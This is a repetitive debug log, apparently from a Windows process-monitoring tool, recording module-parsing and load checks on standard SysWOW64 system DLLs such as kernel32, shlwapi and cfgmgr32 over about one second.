2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:34,013 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:34,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:34,029 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:34,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:34,045 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:34,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:34,059 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:34,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:34,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:34,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:34,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:34,091 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:34,091 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:34,091 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:34,107 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:34,107 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:34,107 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:34,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:34,122 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:34,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:34,138 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:34,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:34,138 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:34,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:34,154 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:34,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:34,168 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:34,168 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:34,168 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:34,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:34,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,357 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:34,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:34,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:34,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:34,450 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:34,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:34,466 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:34,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:34,496 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:34,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:34,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,575 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
